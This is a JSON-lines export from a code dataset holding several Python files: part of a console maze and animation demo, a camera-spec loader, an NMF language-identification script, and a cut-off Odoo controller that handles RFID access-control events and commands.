█',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █ █',\n\t\t'█ █ █ █',\n\t\t'█ █ █ █',\n\t\t'█ █ █',\n\t\t'█ █████████ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ ████████ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'███████████████████████████████'\n\t]\n\n\tblocks = {\n\t '█': Colours.GREY,\n\t ' ': Colours.GREEN\n\t}\n\n\tfor line in maze:\n\t\tfor tile in line:\n\t\t\tcolour = blocks[tile]\n\t\t\tconsole.putColoured(tile, fg=colour, bg=colour)\n\t\tprint()\n\n\tprint()\n\n\tconsole.colour(bg=Colours.GREEN, fg=Colours.WHITE)\n\n\tdef left(steps):\n\t\treturn [(-1, 0) for X in range(steps)]\n\n\tdef right(steps):\n\t\treturn [(1, 0) for X in range(steps)]\n\n\tdef up(steps):\n\t\treturn [(0, -1) for X in range(steps)]\n\n\tdef down(steps):\n\t\treturn [(0, 1) for X in range(steps)]\n\n\tconsole.cursor(3, 5)\n\n\n\t#==============================================================================================================\n\t# Negotiating the maze\n\t#==============================================================================================================\n\t# NOTE: Printing affects cursor position\n\t# TODO: Console should take that into account\n\tfor X, Y in down(6) + right(8) + up(7) + right(6) + down(4) + right(8) + down(6) + left(6) + down(3) + left(8):\n\t\tbreak\n\t\tconsole.cursor(X+console.pos[0], Y+console.pos[1])\n\t\tprint('O')\n\t\tsleep(1/24)\n\t\tconsole.cursor(console.pos[0], console.pos[1])\n\t\tprint(' ')\n\n\n\t#==============================================================================================================\n\t# Rotating bar\n\t#==============================================================================================================\n\tfor f in range(10):\n\t\tbreak\n\t\tconsole.cursor(5,5)\n\t\tprint('|/-\\\\|/-\\\\'[f%8])\n\t\tconsole.cursor(7,12)\n\t\tprint('|/-\\\\|/-\\\\'[f%8])\n\t\tconsole.cursor(6,14)\n\t\tprint('|/-\\\\|/-\\\\'[f%8])\n\t\tsleep(1/8)\n\n\n\t#==============================================================================================================\n\t# Animating coloured squares\n\t#==============================================================================================================\n\tfor f, p, c in zip(range(100), cycle([(5,5), (6,5), (6,6), (5,6)]), cycle([Colours.YELLOW, Colours.PURPLE, Colours.GOLD, Colours.BLOOD])):\n\t\tbreak\n\t\tconsole.cursor(*p)\n\t\tconsole.putColoured(' ', bg=c)\n\t\t\n\t\tconsole.cursor(34, 2)\n\t\tconsole.putColoured('Frame: %d' % f, bg=Colours.BLACK)\n\t\tconsole.cursor(34, 4)\n\t\tconsole.putColoured('X: ', bg=Colours.BLACK, fg=Colours.BLOOD)\n\t\tconsole.putColoured(p[0], bg=Colours.BLACK, fg=Colours.WHITE)\n\t\tconsole.putColoured(', Y: ', bg=Colours.BLACK, fg=Colours.OCEAN)\n\t\tconsole.putColoured(p[1], bg=Colours.BLACK, fg=Colours.WHITE)\n\n\t\tsleep(1/5)\n\n\t\tconsole.cursor(*p)\n\t\tconsole.putColoured(' ', bg=Colours.GREEN)\n\n\tconsole.cursor(0,20)\n\n\n\t#==============================================================================================================\n\t# Markup test\n\t#==============================================================================================================\n\tconsole.printMarkup('Hello there! This is white text. IMPORTANT!')\n\n\n\t#==============================================================================================================\n\t# EVENTS\n\t#==============================================================================================================\n\tapp = tk.Tk()\n\tapp.bind('', \tlambda e: [console.moveCursor(-1, 0), console.putColoured(' ', bg=Colours.GRASS)])\n\tapp.bind('', lambda e: [console.moveCursor(1, 0), console.putColoured(' ', bg=Colours.GRASS)])\n\tapp.bind('', \tlambda e: [console.moveCursor(0, -1), console.putColoured(' ', bg=Colours.GRASS)])\n\tapp.bind('', \tlambda e: [console.moveCursor(0, 1), console.putColoured(' ', bg=Colours.GRASS)])\n\tapp.bind('', lambda e: console.putColoured(' ', bg=choice([Colours.RED, Colours.GOLD, Colours.LAGOON])))\n\tapp.mainloop()\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Console.py","file_name":"Console.py","file_ext":"py","file_size_in_byte":12500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512362606","text":"import os\nimport json\n\nDATASET_PATH = './2013_camera_specs'\n\n\ndef load_json(index):\n source, specification_num = index.split(\"//\")\n specification = specification_num + \".json\"\n with open(os.path.join(DATASET_PATH, source, specification)) as specification_file:\n return json.load(specification_file)\n\n\ndef load_page_title(index):\n return load_json(index).get('')\n\n\ndef load_model(index):\n model = load_json(index).get('model')\n if model:\n if isinstance(model, list):\n concat_model = model[0]\n for i in range(1, len(model)):\n concat_model = concat_model + ' ' + model[i]\n return concat_model\n else:\n return model\n else:\n return 'NO-MODEL'\n\n\n","sub_path":"Rule_Based_Nan/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41005345","text":"import pandas as pd\nimport numpy as np\nimport sys, os\nimport string\nimport re\nimport unicodedata\nimport itertools\nimport random\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation\nfrom sklearn.metrics import accuracy_score\n\neng_sw = np.load('Data/eng_sw.npy')\nfr_sw = np.load('Data/fr_sw.npy')\ndu_sw = np.load('Data/du_sw.npy')\n\nsw_dict = {'EN' : eng_sw, \n\t\t 'FR' : fr_sw, \n\t\t 'DU' : du_sw}\n\ndef remove_accents(input_str):\n nfkd_form = unicodedata.normalize('NFKD', input_str)\n return u\"\".join([c for c in nfkd_form if not unicodedata.combining(c)])\n\ndef preprocess(text, lang=None):\n text = remove_accents(text)\n text = ''.join(i for i in text if not i.isdigit())\n text = ''.join(i for i in text if (i.isalnum() | (i == ' ')))\n text = text.strip()\n words = re.split(r'\\W+', text)\n words = [word.lower() for word in words if word not in string.punctuation]\n words = [word for word in words if len(word) < 15]\n if(lang != None):\n \twords = [word for word in words if word not in sw_dict[lang]]\n return text\n\ndef get_classes(model, feature_names, n_top_words):\n classes = []\n for feature_idx, topic in enumerate(model.components_):\n fnames = [feature_names[i] for i in topic.argsort()[:-n_top_words - 1:-1]]\n if('van' in fnames):\n classes.append('DU')\n elif('the' in fnames):\n classes.append('EN')\n else:\n classes.append('FR')\n return classes\n\ndef print_top_words(model, feature_names, n_top_words):\n for topic_idx, topic in enumerate(model.components_):\n message = \"Topic #%d: \" % topic_idx\n message += \" \".join([feature_names[i]\n for i in topic.argsort()[:-n_top_words - 1:-1]])\n print(message)\n print()\n\ndu = open('Data/Corpus/trainDU.txt', 'r').read().split('.')\nall_du = []\nfor sent in du:\n all_du.append(preprocess(sent, lang='DU'))\nall_du = all_du[1:]\nall_du = [du for du in all_du if du != '']\n\nen = open('Data/Corpus/trainEN.txt', 'r').read().split('.')\nall_en = []\nfor sent in en:\n all_en.append(preprocess(sent, lang='EN'))\nall_en = [en for en in all_en if en != '']\n\nfr = open('Data/Corpus/trainFR.txt', 'r').read().split('.')\nall_fr = []\nfor sent in fr:\n all_fr.append(preprocess(sent, lang='FR'))\nall_fr = [fr for fr in all_fr if fr != '']\n\ntf = TfidfVectorizer()\nsparsem = tf.fit_transform(all_en+all_du+all_fr)\nnmf = NMF(n_components=3, random_state=1,\n alpha=.1, l1_ratio=.5).fit(sparsem)\n\nprint()\nprint()\ntf_features_names = tf.get_feature_names()\nprint_top_words(nmf, tf_features_names, 10)\nprint()\nprint()\n\ntest = open('Data/Test/all.txt', 'r').read().split('\\n')\nclasses = get_classes(nmf, tf.get_feature_names(), 10)\nclasses = input('Classes: ').split(',')\npreds = []\nlabels = np.load('Stats/labels.npy')\nstats = []\n\nfor sentence, label in zip(test, labels):\n try:\n sentence = preprocess(sentence)\n sparset = tf.transform([sentence]).todense()\n results = nmf.transform(sparset)[0]\n idx = results.argmax()\n preds.append(classes[idx])\n for i in range(3):\n stats.append([classes[idx], results[i], classes[i], sentence, label])\n except Exception as e:\n print(e)\n\ndf = pd.DataFrame(stats, columns = ['Prediction', 'Score', 'Language', 'Sentence', 'Label'])\ndf.to_pickle('Stats/nmf_stats.pkl')\n\nprint(accuracy_score(labels, preds))\n\n\n\n","sub_path":"Demo/nmf.py","file_name":"nmf.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182349881","text":"# -*- coding: utf-8 -*-\nfrom odoo import http, fields, exceptions, _\nfrom odoo.http import request\nfrom enum import Enum\n\nimport datetime\nimport json\nimport traceback\nimport psycopg2\nimport logging\nimport time\n\n_logger = logging.getLogger(__name__)\n\n\nclass BadTimeException(Exception):\n pass\n\n\nclass F0Parse(Enum):\n hw_ver = 0\n serial_num = 1\n sw_ver = 2\n inputs = 3\n outputs = 4\n time_schedules = 5\n io_table_lines = 6\n alarm_lines = 7\n mode = 8\n max_cards_count = 9\n max_events_count = 10\n\n\nclass WebRfidController(http.Controller):\n def __init__(self, *args, **kwargs):\n self._post = None\n self._vending_hw_version = None\n self._webstacks_env = None\n self._webstack = None\n self._ws_db_update_dict = None\n self._time_format = '%m.%d.%y %H:%M:%S'\n super(WebRfidController, self).__init__(*args, **kwargs)\n\n def _log_cmd_error(self, description, command, error, status_code):\n command.write({\n 'status': 'Failure',\n 'error': error,\n 'ex_timestamp': fields.datetime.now(),\n 'response': json.dumps(self._post),\n })\n\n self._report_sys_ev(description, command.controller_id)\n return self._check_for_unsent_cmd(status_code)\n\n def _check_for_unsent_cmd(self, status_code, event=None):\n commands_env = request.env['hr.rfid.command'].sudo()\n\n processing_comm = commands_env.search([\n ('webstack_id', '=', self._webstack.id),\n ('status', '=', 'Process'),\n ])\n\n if len(processing_comm) > 0:\n processing_comm = processing_comm[-1]\n return self._retry_command(status_code, processing_comm, event)\n\n command = commands_env.search([\n ('webstack_id', '=', self._webstack.id),\n ('status', '=', 'Wait'),\n ])\n\n if len(command) == 0:\n return { 'status': status_code }\n\n command = command[-1]\n\n if event is not None:\n event.command_id = command\n return self._send_command(command, status_code)\n\n def _retry_command(self, status_code, cmd, event):\n if cmd.retries == 5:\n cmd.status = 'Failure'\n return self._check_for_unsent_cmd(status_code, event)\n\n cmd.retries = cmd.retries + 1\n\n if event is not None:\n event.command_id = cmd\n return self._send_command(cmd, status_code)\n\n def _parse_heartbeat(self):\n self._ws_db_update_dict['version'] = str(self._post['FW'])\n return self._check_for_unsent_cmd(200)\n\n def _parse_event(self):\n controller = request.env['hr.rfid.ctrl'].sudo().search([\n ('ctrl_id', '=', self._post['event']['id']),\n ('webstack_id', '=', self._webstack.id),\n ])\n\n if len(controller) == 0:\n ctrl_env = request.env['hr.rfid.ctrl'].with_user(1)\n cmd_env = request.env['hr.rfid.command'].with_user(1)\n\n # try:\n controller = ctrl_env.create({\n 'name': 'Controller',\n 'ctrl_id': self._post['event']['id'],\n 'webstack_id': self._webstack.id,\n })\n # except\n\n command = cmd_env.read_controller_information_cmd(controller)\n\n return self._send_command(command, 400)\n\n card_env = request.env['hr.rfid.card'].sudo()\n workcodes_env = request.env['hr.rfid.workcode'].sudo()\n card = card_env.search(['|',('active', '=', True), ('active', '=', False),\n ('number', '=', self._post['event']['card']) ])\n reader = None\n event_action = self._post['event']['event_n']\n\n if event_action == 30:\n cmd_env = request.env['hr.rfid.command'].sudo()\n self._report_sys_ev('Controller restarted', controller)\n cmd_env.synchronize_clock_cmd(controller)\n return self._check_for_unsent_cmd(200)\n\n reader_num = self._post['event']['reader']\n if reader_num == 0:\n reader_num = ((self._post['event']['event_n'] - 3) % 4) + 1\n else:\n reader_num = reader_num & 0x07\n for it in controller.reader_ids:\n if it.number == reader_num:\n reader = it\n break\n\n if reader is None:\n self._report_sys_ev('Could not find a reader with that id', controller)\n return self._check_for_unsent_cmd(200)\n\n door = reader.door_id\n\n ev_env = request.env['hr.rfid.event.user'].sudo()\n\n if len(card) == 0:\n if event_action == 64 and controller.hw_version != self._vending_hw_version:\n cmd_env = request.env['hr.rfid.command'].sudo()\n cmd = {\n 'webstack_id': controller.webstack_id.id,\n 'controller_id': controller.id,\n 'cmd': 'DB',\n 'status': 'Process',\n 'ex_timestamp': fields.Datetime.now(),\n 'cmd_data': '40%02X00' % (4 + 4*(reader.number - 1)),\n }\n cmd = cmd_env.create(cmd)\n cmd_js = {\n 'status': 200,\n 'cmd': {\n 'id': cmd.controller_id.ctrl_id,\n 'c': cmd.cmd[:2],\n 'd': cmd.cmd_data,\n }\n }\n cmd.request = json.dumps(cmd_js)\n if self._post['event']['card'] == '0000000000':\n self._report_sys_ev('', controller)\n else:\n self._report_sys_ev(_('Could not find the card'), controller)\n return cmd_js\n elif event_action in [ 21, 22, 23, 24 ]:\n event_dict = {\n 'ctrl_addr': controller.ctrl_id,\n 'door_id': reader.door_id.id,\n 'reader_id': reader.id,\n 'event_time': self._get_ws_time_str(),\n 'event_action': '5', # Exit button\n }\n event = ev_env.create(event_dict)\n return self._check_for_unsent_cmd(200, event)\n\n if self._post['event']['card'] == '0000000000':\n self._report_sys_ev('', controller)\n else:\n self._report_sys_ev(_('Could not find the card'), controller)\n return self._check_for_unsent_cmd(200)\n\n # External db event, controller requests for permission to open or close door\n if event_action == 64 and controller.hw_version != self._vending_hw_version:\n ret = request.env['hr.rfid.access.group.door.rel'].sudo().search([\n ('access_group_id', 'in', card.get_owner().hr_rfid_access_group_ids.ids),\n ('door_id', '=', reader.door_id.id)\n ])\n return self._respond_to_ev_64(len(ret) > 0 and card.active is True,\n controller, reader, card)\n\n event_action = ((event_action - 3) % 4) + 1\n # Turnstile controller. If the 7th bit is not up, then there was no actual entry\n if controller.hw_version == '9' \\\n and (self._post['event']['reader'] & 64) == 0 \\\n and event_action == '1':\n event_action = '6'\n\n # Relay controller\n if controller.is_relay_ctrl() and event_action == 1 and controller.mode == 3:\n dt = self._post['event']['dt']\n if len(dt) == 24:\n chunks = [ dt[0:6], dt[6:12], dt[12:18], dt[18:24] ]\n print('Chunks=' + str(chunks))\n door_number = 0\n for i in range(len(chunks)):\n chunk = chunks[i]\n n1 = int(chunk[:2])\n n2 = int(chunk[2:4])\n n3 = int(chunk[4:])\n door_number |= n1*100 + n2*10 + n3\n if i != len(chunks)-1:\n door_number <<= 8\n for _door in reader.door_ids:\n if _door.number == door_number:\n door = _door\n break\n\n event_dict = {\n 'ctrl_addr': controller.ctrl_id,\n 'door_id': door.id,\n 'reader_id': reader.id,\n 'card_id': card.id,\n 'event_time': self._get_ws_time_str(),\n 'event_action': str(event_action),\n }\n\n if reader.mode == '03' and controller.hw_version != self._vending_hw_version: # Card and workcode\n wc = workcodes_env.search([\n ('workcode', '=', self._post['event']['dt'])\n ])\n if len(wc) == 0:\n event_dict['workcode'] = self._post['event']['dt']\n else:\n event_dict['workcode_id'] = wc.id\n\n self._get_card_owner(event_dict, card)\n event = ev_env.create(event_dict)\n\n return self._check_for_unsent_cmd(200, event)\n\n def _parse_response(self):\n command_env = request.env['hr.rfid.command'].with_user(1)\n response = self._post['response']\n controller = None\n\n for ctrl in self._webstack.controllers:\n if ctrl.ctrl_id == response['id']:\n controller = ctrl\n break\n\n if controller is None:\n self._report_sys_ev('Module sent us a response from a controller that does not exist')\n return self._check_for_unsent_cmd(200)\n\n command = command_env.search([ ('webstack_id', '=', self._webstack.id),\n ('controller_id', '=', controller.id),\n ('status', '=', 'Process'),\n ('cmd', '=', response['c']), ], limit=1)\n\n if len(command) == 0 and response['c'] == 'DB':\n command = command_env.search([ ('webstack_id', '=', self._webstack.id),\n ('controller_id', '=', controller.id),\n ('status', '=', 'Process'),\n ('cmd', '=', 'DB2'), ], limit=1)\n\n if len(command) == 0:\n self._report_sys_ev('Controller sent us a response to a command we never sent')\n return self._check_for_unsent_cmd(200)\n\n if response['e'] != 0:\n command.write({\n 'status': 'Failure',\n 'error': str(response['e']),\n 'ex_timestamp': fields.datetime.now(),\n 'response': json.dumps(self._post),\n })\n return self._check_for_unsent_cmd(200)\n\n if response['c'] == 'F0':\n self._parse_f0_response(command, controller)\n\n if response['c'] == 'F6':\n data = response['d']\n readers = [None, None, None, None]\n for it in controller.reader_ids:\n readers[it.number-1] = it\n for i in range(4):\n if readers[i] is not None:\n mode = str(data[i*6:i*6+2])\n readers[i].write({\n 'mode': mode,\n 'no_d6_cmd': True,\n })\n\n if response['c'] == 'F9':\n controller.write({\n 'io_table': response['d']\n })\n\n if response['c'] == 'FC':\n apb_mode = response['d']\n for door in controller.door_ids:\n door.apb_mode = (door.number == '1' and (apb_mode & 1)) \\\n or (door.number == '2' and (apb_mode & 2))\n\n if response['c'] == 'B3':\n data = response['d']\n\n entrance = [ int(data[0:2], 16), int(data[2:4], 16) ]\n exit = [ int(data[4:6], 16), int(data[6:8], 16) ]\n usys = [ int(data[8:10], 16), int(data[10:12], 16) ]\n uin = [ int(data[12:14], 16), int(data[14:16], 16) ]\n temperature = int(data[16:20], 10)\n humidity = int(data[20:24], 10)\n Z1 = int(data[24:26], 16)\n Z2 = int(data[26:28], 16)\n Z3 = int(data[28:30], 16)\n Z4 = int(data[30:32], 16)\n\n TOS = int(data[32:34], 16) * 10000 \\\n + int(data[34:36], 16) * 1000 \\\n + int(data[36:38], 16) * 100 \\\n + int(data[38:40], 16) * 10 \\\n + int(data[40:42], 16)\n\n DT = [ int(data[42:44], 16), int(data[44:46], 16), int(data[46:48], 16) ]\n\n if temperature >= 1000:\n temperature -= 1000\n temperature *= -1\n temperature /= 10\n\n humidity /= 10\n\n sys_voltage = ((usys[0] & 0xF0) >> 4) * 1000\n sys_voltage += (usys[0] & 0x0F) * 100\n sys_voltage += ((usys[1] & 0xF0) >> 4) * 10\n sys_voltage += (usys[1] & 0x0F)\n sys_voltage = (sys_voltage * 8) / 500\n\n input_voltage = ((uin[0] & 0xF0) >> 4) * 1000\n input_voltage += (uin[0] & 0x0F) * 100\n input_voltage += ((uin[1] & 0xF0) >> 4) * 10\n input_voltage += (uin[1] & 0x0F)\n input_voltage = (input_voltage * 8) / 500\n\n controller.write({\n 'temperature': temperature,\n 'humidity': humidity,\n 'system_voltage': sys_voltage,\n 'input_voltage': input_voltage,\n })\n\n command.write({\n 'status': 'Success',\n 'ex_timestamp': fields.datetime.now(),\n 'response': json.dumps(self._post),\n })\n\n return self._check_for_unsent_cmd(200)\n\n def _parse_f0_cmd(self, data):\n def bytes_to_num(start, digits):\n digits = digits-1\n res = 0\n for j in range(digits+1):\n multiplier = 10 ** (digits-j)\n res = res + int(data[start:start+2], 16) * multiplier\n start = start + 2\n return res\n\n return {\n F0Parse.hw_ver: str(bytes_to_num(0, 2)),\n F0Parse.serial_num: str(bytes_to_num(4, 4)),\n F0Parse.sw_ver: str(bytes_to_num(12, 3)),\n F0Parse.inputs: bytes_to_num(18, 3),\n F0Parse.outputs: bytes_to_num(24, 3),\n F0Parse.time_schedules: bytes_to_num(32, 2),\n F0Parse.io_table_lines: bytes_to_num(36, 2),\n F0Parse.alarm_lines: bytes_to_num(40, 1),\n F0Parse.mode: int(data[42:44], 16),\n F0Parse.max_cards_count: bytes_to_num(44, 5),\n F0Parse.max_events_count: bytes_to_num(54, 5),\n }\n\n def _parse_f0_response(self, command, controller):\n ctrl_env = request.env['hr.rfid.ctrl'].with_user(1)\n response = self._post['response']\n data = response['d']\n ctrl_mode = int(data[42:44], 16)\n external_db = (ctrl_mode & 0x20) > 0\n relay_time_factor = '1' if ctrl_mode & 0x40 else '0'\n dual_person_mode = (ctrl_mode & 0x08) > 0\n ctrl_mode = ctrl_mode & 0x07\n\n f0_parse = self._parse_f0_cmd(data)\n\n hw_ver = f0_parse[F0Parse.hw_ver]\n\n if (ctrl_mode < 1 or ctrl_mode > 4):\n return self._log_cmd_error('F0 command failure, controller sent '\n 'us a wrong mode', command, '31', 200)\n\n readers_count = int(data[30:32], 16)\n\n mode_reader_relation = { 1: [1, 2], 2: [2, 4], 3: [4], 4: [4] }\n\n if not ctrl_env.hw_version_is_for_relay_ctrl(hw_ver) and \\\n readers_count not in mode_reader_relation[ctrl_mode]:\n return self._log_cmd_error('F0 sent us a wrong reader-controller '\n 'mode combination', command, '31', 200)\n\n reader_env = request.env['hr.rfid.reader'].with_user(1)\n door_env = request.env['hr.rfid.door'].with_user(1)\n\n sw_ver = f0_parse[F0Parse.sw_ver]\n inputs = f0_parse[F0Parse.inputs]\n outputs = f0_parse[F0Parse.outputs]\n time_schedules = f0_parse[F0Parse.time_schedules]\n io_table_lines = f0_parse[F0Parse.io_table_lines]\n alarm_lines = f0_parse[F0Parse.alarm_lines]\n max_cards_count = f0_parse[F0Parse.max_cards_count]\n max_events_count = f0_parse[F0Parse.max_events_count]\n serial_num = f0_parse[F0Parse.serial_num]\n\n old_ctrl = ctrl_env.search([\n ('serial_number', '=', serial_num)\n ], limit=1)\n\n ctrl_already_existed = False\n if len(old_ctrl) > 0:\n if old_ctrl.webstack_id == controller.webstack_id:\n ctrl_already_existed = True\n else:\n old_ctrl.webstack_id = controller.webstack_id\n\n old_reader_count = len(controller.reader_ids)\n old_door_count = len(controller.door_ids)\n new_reader_count = 0\n new_door_count = 0\n\n def create_door(name, number):\n # If the controller is a vending controller\n nonlocal old_door_count\n nonlocal new_door_count\n\n door_dict = {\n 'name': name,\n 'number': number,\n 'controller_id': controller.id,\n }\n\n if new_door_count < old_door_count:\n new_door_count += 1\n _door = controller.door_ids[new_door_count-1]\n door_dict.pop('name')\n _door.write(door_dict)\n return _door\n\n if hw_ver == self._vending_hw_version:\n return None\n return door_env.create(door_dict)\n\n def create_reader(name, number, reader_type, door_id=None):\n create_dict = {\n 'name': name,\n 'number': number,\n 'reader_type': reader_type,\n 'controller_id': controller.id,\n }\n\n nonlocal old_reader_count\n nonlocal new_reader_count\n\n if door_id is not None:\n create_dict['door_id'] = door_id\n\n if new_reader_count < old_reader_count:\n new_reader_count += 1\n _reader = controller.reader_ids[new_reader_count-1]\n create_dict.pop('name')\n _reader.write(create_dict)\n return _reader\n\n return reader_env.create(create_dict)\n\n def add_door_to_reader(_reader, _door):\n _reader.door_ids += _door\n\n def gen_d_name(door_num, controller_id):\n return 'Door ' + str(door_num) + ' of ctrl ' + str(controller_id)\n\n if controller.hw_version_is_for_relay_ctrl(hw_ver):\n if ctrl_mode == 1 or ctrl_mode == 3:\n reader = create_reader('R1', 1, '0')\n for i in range(outputs):\n door = create_door(gen_d_name(i+1, controller.id), i+1)\n add_door_to_reader(reader, door)\n for i in range(1, readers_count):\n create_reader('R' + str(i+1), i+1, '0')\n elif ctrl_mode == 2:\n if outputs > 16 and readers_count < 2:\n return self._log_cmd_error('F0 sent us too many outputs and not enough readers',\n command, '31', 200)\n reader = create_reader('R1', 1, '0')\n for i in range(outputs):\n door = create_door(gen_d_name(i+1, controller.id), i+1)\n add_door_to_reader(reader, door)\n if outputs > 16:\n reader = create_reader('R2', 2, '0')\n for i in range(outputs-16):\n door = create_door(gen_d_name(i+1, controller.id), i+1)\n add_door_to_reader(reader, door)\n for i in range(2, readers_count):\n create_reader('R' + str(i+1), i+1, '0')\n else:\n for i in range(1, readers_count):\n create_reader('R' + str(i+1), i+1, '0')\n else:\n raise exceptions.ValidationError(_('Got controller mode=%d for hw_ver=%s???')\n % (ctrl_mode, hw_ver))\n else:\n if ctrl_mode == 1 or ctrl_mode == 3:\n last_door = create_door(gen_d_name(1, controller.id), 1)\n last_door = last_door.id\n create_reader('R1', 1, '0', last_door)\n if readers_count > 1:\n create_reader('R2', 2, '1', last_door)\n elif ctrl_mode == 2 and readers_count == 4:\n last_door = create_door(gen_d_name(1, controller.id), 1)\n last_door = last_door.id\n create_reader('R1', 1, '0', last_door)\n create_reader('R2', 2, '1', last_door)\n last_door = create_door(gen_d_name(2, controller.id), 2)\n last_door = last_door.id\n create_reader('R3', 3, '0', last_door)\n create_reader('R4', 4, '1', last_door)\n else: # (ctrl_mode == 2 and readers_count == 2) or ctrl_mode == 4\n print('harware version', hw_ver)\n last_door = create_door(gen_d_name(1, controller.id), 1)\n if last_door: \n last_door = last_door.id \n else:\n last_door = None\n create_reader('R1', 1, '0', last_door)\n last_door = create_door(gen_d_name(2, controller.id), 2)\n if last_door: \n \t last_door = last_door.id \n else:\n last_door = None\n create_reader('R2', 2, '0', last_door)\n\n if ctrl_mode == 3:\n last_door = create_door(gen_d_name(2, controller.id), 2)\n last_door = last_door.id\n create_reader('R3', 3, '0', last_door)\n last_door = create_door(gen_d_name(3, controller.id), 3)\n last_door = last_door.id\n create_reader('R4', 4, '0', last_door)\n elif ctrl_mode == 4:\n last_door = create_door(gen_d_name(3, controller.id), 3)\n last_door = last_door.id\n create_reader('R3', 3, '0', last_door)\n last_door = create_door(gen_d_name(4, controller.id), 4)\n last_door = last_door.id\n create_reader('R4', 4, '0', last_door)\n\n if old_reader_count > new_reader_count:\n controller.reader_ids[new_reader_count : old_reader_count].unlink()\n if old_door_count > new_door_count:\n controller.door_ids[new_door_count : old_door_count].unlink()\n\n if controller.serial_number is False:\n controller.name = 'Controller ' + serial_num + ' ' + str(controller.ctrl_id)\n\n controller.write({\n 'hw_version': hw_ver,\n 'serial_number': serial_num,\n 'sw_version': sw_ver,\n 'inputs': inputs,\n 'outputs': outputs,\n 'readers': readers_count,\n 'time_schedules': time_schedules,\n 'io_table_lines': io_table_lines,\n 'alarm_lines': alarm_lines,\n 'mode': ctrl_mode,\n 'external_db': external_db,\n 'relay_time_factor': relay_time_factor,\n 'dual_person_mode': dual_person_mode,\n 'max_cards_count': max_cards_count,\n 'max_events_count': max_events_count,\n 'last_f0_read': fields.datetime.now(),\n })\n\n cmd_env = request.env['hr.rfid.command'].sudo()\n if not ctrl_already_existed:\n cmd_env.synchronize_clock_cmd(controller)\n cmd_env.delete_all_cards_cmd(controller)\n cmd_env.delete_all_events_cmd(controller)\n cmd_env.read_readers_mode_cmd(controller)\n cmd_env.read_io_table_cmd(controller)\n\n if not controller.is_relay_ctrl() and (ctrl_mode == 1 or ctrl_mode == 3):\n cmd_env.read_anti_pass_back_mode_cmd(controller)\n\n def _report_sys_ev(self, description, controller=None):\n sys_ev_env = request.env['hr.rfid.event.system'].sudo()\n\n sys_ev = {\n 'webstack_id': self._webstack.id,\n 'error_description': description,\n 'input_js': json.dumps(self._post),\n }\n\n if 'event' in self._post:\n try:\n sys_ev['timestamp'] = self._get_ws_time_str()\n except BadTimeException:\n sys_ev['timestamp'] = str(fields.datetime.now())\n sys_ev['event_action'] = str(self._post['event']['event_n'])\n else:\n sys_ev['timestamp'] = datetime.datetime.now()\n\n if controller is not None:\n sys_ev['controller_id'] = controller.id\n\n sys_ev_env.create(sys_ev)\n\n def _respond_to_ev_64(self, open_door, controller, reader, card):\n cmd_env = request.env['hr.rfid.command'].sudo()\n ev_env = request.env['hr.rfid.event.user'].sudo()\n open_door = 3 if open_door is True else 4\n cmd = {\n 'webstack_id': controller.webstack_id.id,\n 'controller_id': controller.id,\n 'cmd': 'DB',\n 'status': 'Process',\n 'ex_timestamp': fields.Datetime.now(),\n }\n if not controller.is_relay_ctrl():\n cmd['cmd_data'] = '40%02X00' % (open_door + 4*(reader.number - 1))\n else:\n data = 0\n user_doors = card.get_owner().get_doors()\n for door in reader.door_ids:\n if door in user_doors:\n data |= 1 << (door.number - 1)\n cmd['cmd_data'] = '4000' + request.env['hr.rfid.door'].create_rights_int_to_str(data)\n event = {\n 'ctrl_addr': controller.ctrl_id,\n 'door_id': reader.door_id.id,\n 'reader_id': reader.id,\n 'card_id': card.id,\n 'event_time': self._get_ws_time_str(),\n 'event_action': '64',\n }\n self._get_card_owner(event, card)\n cmd = cmd_env.create(cmd)\n cmd_js = {\n 'status': 200,\n 'cmd': {\n 'id': cmd.controller_id.ctrl_id,\n 'c': cmd.cmd[:2],\n 'd': cmd.cmd_data,\n }\n }\n cmd.request = json.dumps(cmd_js)\n event['command_id'] = cmd.id\n ev_env.create(event)\n return cmd_js\n\n def _get_ws_time_str(self):\n return self._get_ws_time().strftime('%Y-%m-%d %H:%M:%S')\n\n def _get_ws_time(self):\n t = self._post['event']['date'] + ' ' + self._post['event']['time']\n try:\n ws_time = datetime.datetime.strptime(t, self._time_format)\n ws_time -= self._get_tz_offset(self._webstack)\n except ValueError:\n raise BadTimeException\n return ws_time\n\n @staticmethod\n def _get_tz_offset(webstack):\n tz_h = int(webstack.tz_offset[:3], 10)\n tz_m = int(webstack.tz_offset[3:], 10)\n return datetime.timedelta(hours=tz_h, minutes=tz_m)\n\n @staticmethod\n def _get_card_owner(event_dict: dict, card):\n if len(card.employee_id) == 0:\n event_dict['contact_id'] = card.contact_id.id\n else:\n event_dict['employee_id'] = card.employee_id.id\n\n @staticmethod\n def _send_command(command, status_code):\n command.status = 'Process'\n\n json_cmd = {\n 'status': status_code,\n 'cmd': {\n 'id': command.controller_id.ctrl_id,\n 'c': command.cmd[:2],\n 'd': command.cmd_data,\n }\n }\n\n if command.cmd == 'D1':\n if not command.controller_id.is_relay_ctrl():\n card_num = ''.join(list('0' + ch for ch in command.card_number))\n pin_code = ''.join(list('0' + ch for ch in command.pin_code))\n ts_code = str(command.ts_code)\n rights_data = '{:02X}'.format(command.rights_data)\n rights_mask = '{:02X}'.format(command.rights_mask)\n json_cmd['cmd']['d'] = card_num + pin_code + ts_code + rights_data + rights_mask\n else:\n card_num = ''.join(list('0' + ch for ch in command.card_number))\n rights_data = '%03d%03d%03d%03d' % (\n (command.rights_data >> (3*8)) & 0xFF,\n (command.rights_data >> (2*8)) & 0xFF,\n (command.rights_data >> (1*8)) & 0xFF,\n (command.rights_data >> (0*8)) & 0xFF,\n )\n if command.controller_id.mode == 3:\n rights_mask = '255255255255'\n else:\n rights_mask = '%03d%03d%03d%03d' % (\n (command.rights_mask >> 